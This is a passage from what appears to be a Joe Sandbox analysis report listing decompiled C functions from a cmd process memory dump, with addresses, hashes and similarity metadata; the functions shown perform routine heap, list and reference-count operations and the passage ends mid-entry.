                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                          			E03BD4F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E03CA88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E03BFC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x3bb1030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









                                                                                                                                          0x03bd4f2e
                                                                                                                                          0x03bd4f34
                                                                                                                                          0x03bd4f38
                                                                                                                                          0x03c30b85
                                                                                                                                          0x03c30b85
                                                                                                                                          0x03c30b89
                                                                                                                                          0x03c30b9a
                                                                                                                                          0x03c30b9a
                                                                                                                                          0x03c30b9f
                                                                                                                                          0x00000000
                                                                                                                                          0x03c30b9f
                                                                                                                                          0x03c30b94
                                                                                                                                          0x03c30b98
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c30b98
                                                                                                                                          0x03bd4f3e
                                                                                                                                          0x03bd4f48
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd4f6e
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd4f70

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 7b30fd1ef704c86f99320c07fffc0f2ac618aafb613c64f8dfc76bb44db3edf9
                                                                                                                                          • Instruction ID: 0a674b9c29d8e9261bbd5eec93d8f17c41093bfcaff594c44faabc7d25b19eb2
                                                                                                                                          • Opcode Fuzzy Hash: 7b30fd1ef704c86f99320c07fffc0f2ac618aafb613c64f8dfc76bb44db3edf9
                                                                                                                                          • Instruction Fuzzy Hash: 47F05E37925BA49FD761D718C144B22B7E8AB0667CF4954B5D406CF921CF74ED84C640
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03CA8CD6 Relevance: .0, Instructions: 31COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 36%
                                                                                                                                          			E03CA8CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x3ccd360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E03BF7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E03C1B640(E03C19AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                                                                                                          0x03ca8ce5
                                                                                                                                          0x03ca8ced
                                                                                                                                          0x03ca8cf0
                                                                                                                                          0x03ca8cfb
                                                                                                                                          0x03ca8d0d
                                                                                                                                          0x03ca8cfd
                                                                                                                                          0x03ca8d06
                                                                                                                                          0x03ca8d06
                                                                                                                                          0x03ca8d18
                                                                                                                                          0x03ca8d19
                                                                                                                                          0x03ca8d1b
                                                                                                                                          0x03ca8d20
                                                                                                                                          0x03ca8d33

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: f095ff55d68d7c4904e5743af83dce2a9212a5ee3f65bd8c8c7e8ce32fe096bd
                                                                                                                                          • Instruction ID: bd46c25629cb91e24ae550b2c429144ba75d27ff287232bfb307b2d17b78f1de
                                                                                                                                          • Opcode Fuzzy Hash: f095ff55d68d7c4904e5743af83dce2a9212a5ee3f65bd8c8c7e8ce32fe096bd
                                                                                                                                          • Instruction Fuzzy Hash: 52F0E274A04709AFCB04EBA8D846E6EBBB4EF09304F1401A9F902EF280EA34DD00D754
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03BF746D Relevance: .0, Instructions: 31COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 88%
                                                                                                                                          			E03BF746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E03BEEB70(__ecx, 0x3cc79a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E03C195D0();
							L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









                                                                                                                                          0x03bf746d
                                                                                                                                          0x03bf746d
                                                                                                                                          0x03bf746d
                                                                                                                                          0x03bf7471
                                                                                                                                          0x03bf7488
                                                                                                                                          0x03c3f92d
                                                                                                                                          0x03bf748e
                                                                                                                                          0x03bf7491
                                                                                                                                          0x03bf7495
                                                                                                                                          0x03c3f937
                                                                                                                                          0x03c3f93a
                                                                                                                                          0x03c3f94e
                                                                                                                                          0x03c3f953
                                                                                                                                          0x03c3f956
                                                                                                                                          0x03c3f956
                                                                                                                                          0x03bf7495
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf7488
                                                                                                                                          0x03bf7473
                                                                                                                                          0x03bf7478
                                                                                                                                          0x03bf747d
                                                                                                                                          0x03bf7481
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf7481
                                                                                                                                          0x03bf747d
                                                                                                                                          0x03bf747a
                                                                                                                                          0x00000000

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: ed5f3e534111c86df29c67d801b509c7cf6e96f5b12b3a93e2800489bbeb8974
                                                                                                                                          • Instruction ID: 939d6a4e33e5b8c0e5c6aa68b1b1c361d977a42f21f0042e93219f9851af3744
                                                                                                                                          • Opcode Fuzzy Hash: ed5f3e534111c86df29c67d801b509c7cf6e96f5b12b3a93e2800489bbeb8974
                                                                                                                                          • Instruction Fuzzy Hash: CAF0B434900A44AECF01D778C842F79BBA1AF45298F0816F9D6D1EB160EB6498068B95
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C0A44B Relevance: .0, Instructions: 29COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                          			E03C0A44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x3cc7b9c; // 0x0
				_t15 = __ecx;
				_t16 = L03BF4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E03C1FA60(_t17, 0, _t15 << 2);
				return _t17;
			}







                                                                                                                                          0x03c0a44b
                                                                                                                                          0x03c0a453
                                                                                                                                          0x03c0a472
                                                                                                                                          0x03c0a476
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0a493
                                                                                                                                          0x03c0a47a
                                                                                                                                          0x03c0a47f
                                                                                                                                          0x03c0a486
                                                                                                                                          0x00000000

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 1fa73442c1849dcf225589c1296b1c27177a2e6c05507dca3032ac6a44e6fe64
                                                                                                                                          • Instruction ID: 43523cdbb3230a1d2a61ff76d76d5b2b4c9b31b01a5acde99474b472849ebf48
                                                                                                                                          • Opcode Fuzzy Hash: 1fa73442c1849dcf225589c1296b1c27177a2e6c05507dca3032ac6a44e6fe64
                                                                                                                                          • Instruction Fuzzy Hash: 40E02276A01520ABC2119E48AC00F67B3ADDBD0A10F0A0038E504CB250CA28DE02C7E4
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03BDF358 Relevance: .0, Instructions: 28COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                          			E03BDF358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E03C0F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L03BF4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                                                                                                                                          0x03bdf35d
                                                                                                                                          0x03bdf361
                                                                                                                                          0x03bdf367
                                                                                                                                          0x03bdf372
                                                                                                                                          0x03bdf38c
                                                                                                                                          0x03bdf38c
                                                                                                                                          0x03bdf394

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                                                                                          • Instruction ID: d05ead2f1df641087342fe22a602309428aa5f717f1c134f0844aa6a6d597f9a
                                                                                                                                          • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                                                                                          • Instruction Fuzzy Hash: 6FE09232A40218BBCB25D6999D05F6ABAACDB44A60F0501A5B904DB550D5709E40D2D0
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03BEFF60 Relevance: .0, Instructions: 22COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                          			E03BEFF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x3bb11a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E03CA88F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E03BF0050(_t14);
				}
			}










                                                                                                                                          0x03beff66
                                                                                                                                          0x03beff6b
                                                                                                                                          0x00000000
                                                                                                                                          0x03beff8f
                                                                                                                                          0x00000000
                                                                                                                                          0x03beff8f

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: d71a47f8e4032035855c6f429869773be6226b9e9169f5492ab8d6fada3088a8
                                                                                                                                          • Instruction ID: 5afcf3ec84e8e3b3f1de85a6ea0eeb0e1308522f8597872edf98bbde8df3472b
                                                                                                                                          • Opcode Fuzzy Hash: d71a47f8e4032035855c6f429869773be6226b9e9169f5492ab8d6fada3088a8
                                                                                                                                          • Instruction Fuzzy Hash: A4E09AB12063449FDB34DBA9D160F357BACDF46629F1F80F9E0088B101DB21D880C28A
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C8D380 Relevance: .0, Instructions: 21COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                          			E03C8D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L03BDE8B0(__ecx, _a4, 0xfff);
					L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                                                                                                                                          0x03c8d38a
                                                                                                                                          0x03c8d39b
                                                                                                                                          0x03c8d3b1
                                                                                                                                          0x00000000
                                                                                                                                          0x03c8d3b6
                                                                                                                                          0x00000000

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                                                                                          • Instruction ID: cb4a9a8281888b5d129f0b09ea3f8e89c9aaa6b9a1ef1ddd31d79fa0de72ec2b
                                                                                                                                          • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                                                                                          • Instruction Fuzzy Hash: 07E08C35280344BBDB22AA44CC00BA97A2A9B407A8F104071BE099E690CA71AE91D7C4
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C641E8 Relevance: .0, Instructions: 21COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 82%
                                                                                                                                          			E03C641E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x3cb08f0);
				_t5 = E03C2D08C(__ebx, __edi, __esi);
				if( *0x3cc87ec == 0) {
					E03BEEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x3cc87ec == 0) {
						 *0x3cc87f0 = 0x3cc87ec;
						 *0x3cc87ec = 0x3cc87ec;
						 *0x3cc87e8 = 0x3cc87e4;
						 *0x3cc87e4 = 0x3cc87e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L03C64248();
				}
				return E03C2D0D1(_t5);
			}





                                                                                                                                          0x03c641e8
                                                                                                                                          0x03c641ea
                                                                                                                                          0x03c641ef
                                                                                                                                          0x03c641fb
                                                                                                                                          0x03c64206
                                                                                                                                          0x03c6420b
                                                                                                                                          0x03c64216
                                                                                                                                          0x03c6421d
                                                                                                                                          0x03c64222
                                                                                                                                          0x03c6422c
                                                                                                                                          0x03c64231
                                                                                                                                          0x03c64231
                                                                                                                                          0x03c64236
                                                                                                                                          0x03c6423d
                                                                                                                                          0x03c6423d
                                                                                                                                          0x03c64247

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 90238f672d791e8b959b4c4c9b796254a7175d3da5a6b0ade8530ea2d420ea9f
                                                                                                                                          • Instruction ID: 2f4c15e78ae1597ec76afa7c3aaf208e32011d6e2f0a5a51c63d3712e47ca06e
                                                                                                                                          • Opcode Fuzzy Hash: 90238f672d791e8b959b4c4c9b796254a7175d3da5a6b0ade8530ea2d420ea9f
                                                                                                                                          • Instruction Fuzzy Hash: 29F06DB8831724CFCBA1FFA9D54471A37B4FB44310F12416AE111CB298E7344980DF21
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C0A185 Relevance: .0, Instructions: 20COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                          			E03C0A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x3cc67e4 >= 0xa) {
					if(_t5 < 0x3cc6800 || _t5 >= 0x3cc6900) {
						return L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E03BF0010(0x3cc67e0, _t5);
				}
			}





                                                                                                                                          0x03c0a190
                                                                                                                                          0x03c0a1a6
                                                                                                                                          0x03c0a1c2
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0a192
                                                                                                                                          0x03c0a192
                                                                                                                                          0x03c0a19f
                                                                                                                                          0x03c0a19f

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 18b665b303eb5fb203e89a8bd1fb9e130f4cb53be60e6a25a3e1975539c04ee8
                                                                                                                                          • Instruction ID: eba095d9c91ae46efc3a9b391c6be7a787fdf03a178374e9b895f6b58e623b46
                                                                                                                                          • Opcode Fuzzy Hash: 18b665b303eb5fb203e89a8bd1fb9e130f4cb53be60e6a25a3e1975539c04ee8
                                                                                                                                          • Instruction Fuzzy Hash: FED02BB65302C49EC71EE314CE14B21A212E788700F34089CE203CE5E0DF618CF5834C
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C016E0 Relevance: .0, Instructions: 17COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                          			E03C016E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E03C01710(0x3cc67e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L03BF4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





                                                                                                                                          0x03c016e8
                                                                                                                                          0x03c016ef
                                                                                                                                          0x03c016f3
                                                                                                                                          0x03c016fe
                                                                                                                                          0x00000000
                                                                                                                                          0x03c01700
                                                                                                                                          0x03c0170d
                                                                                                                                          0x03c0170d
                                                                                                                                          0x03c016f2
                                                                                                                                          0x03c016f2
                                                                                                                                          0x03c016f2
                                                                                                                                          0x03c016f2

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 5bd05d457d6b5c77f1f5e61d19d3d97fdc66ec8d8afd25f65511f19f89140933
                                                                                                                                          • Instruction ID: 8bb7325414d4878ca9efdd52895bc40adb2b5aa215a8d1aba4654182bb10ac33
                                                                                                                                          • Opcode Fuzzy Hash: 5bd05d457d6b5c77f1f5e61d19d3d97fdc66ec8d8afd25f65511f19f89140933
                                                                                                                                          • Instruction Fuzzy Hash: C7D0A775110280A6DE2DDB159C04B19A251EB80B95F3C00ACF207CD8C0CFB0CEA2E048
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C553CA Relevance: .0, Instructions: 16COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                          			E03C553CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E03BEEB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}








                                                                                                                                          0x03c553ca
                                                                                                                                          0x03c553ce
                                                                                                                                          0x03c553d9
                                                                                                                                          0x03c553de
                                                                                                                                          0x03c553e1
                                                                                                                                          0x03c553e1
                                                                                                                                          0x03c553e6
                                                                                                                                          0x03c553f3
                                                                                                                                          0x00000000
                                                                                                                                          0x03c553f8
                                                                                                                                          0x03c553fb

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                                                                                          • Instruction ID: 5c73e5f68ee49a31bd561470ce4bf88d659cefb31e6a6e86a6c52f1b78e4e3f8
                                                                                                                                          • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                                                                                          • Instruction Fuzzy Hash: 53E08C35A007809FCF12DB58C690F4EB7F5FB45B40F180094B409AF620C624ED00CB40
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03BEAAB0 Relevance: .0, Instructions: 12COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                          			E03BEAAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                                                                                                                                          0x03beaab6
                                                                                                                                          0x03beaabb
                                                                                                                                          0x03c3a442
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3a448
                                                                                                                                          0x03c3a454
                                                                                                                                          0x03c3a454
                                                                                                                                          0x03beaac1
                                                                                                                                          0x03beaac1
                                                                                                                                          0x03beaac6
                                                                                                                                          0x03beaac6

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                                                                                          • Instruction ID: a49661a26758a0743048e32d6964245325c9d71f7b1ee4cd64cf07dba15abbab
                                                                                                                                          • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                                                                                          • Instruction Fuzzy Hash: DED0E939352A80CFD616CB1DC554B1573A8FB45B44FC918E0E541CB761E72CD954CA00
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C035A1 Relevance: .0, Instructions: 12COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                          			E03C035A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E03BEEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






                                                                                                                                          0x03c035a1
                                                                                                                                          0x03c035a1
                                                                                                                                          0x03c035a5
                                                                                                                                          0x03c035ab
                                                                                                                                          0x03c035ab
                                                                                                                                          0x03c035b5
                                                                                                                                          0x00000000
                                                                                                                                          0x03c035c1
                                                                                                                                          0x03c035b7

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                                                                                          • Instruction ID: fb245cab65f22effef0ddc92cf9b08773c3a7c17b7cbef77f9880812fdcccbcb
                                                                                                                                          • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                                                                                          • Instruction Fuzzy Hash: 66D0A73D4015C099DB03FB90C1247687375BB00208F5C10A58001C94F1C3354A09DE00
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03BDDB40 Relevance: .0, Instructions: 11COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                          			E03BDDB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L03BF4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                                                                                                                                          0x03bddb4d
                                                                                                                                          0x03bddb54
                                                                                                                                          0x03bddb5f
                                                                                                                                          0x03bddb56
                                                                                                                                          0x03bddb56
                                                                                                                                          0x03bddb5c
                                                                                                                                          0x03bddb5c

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
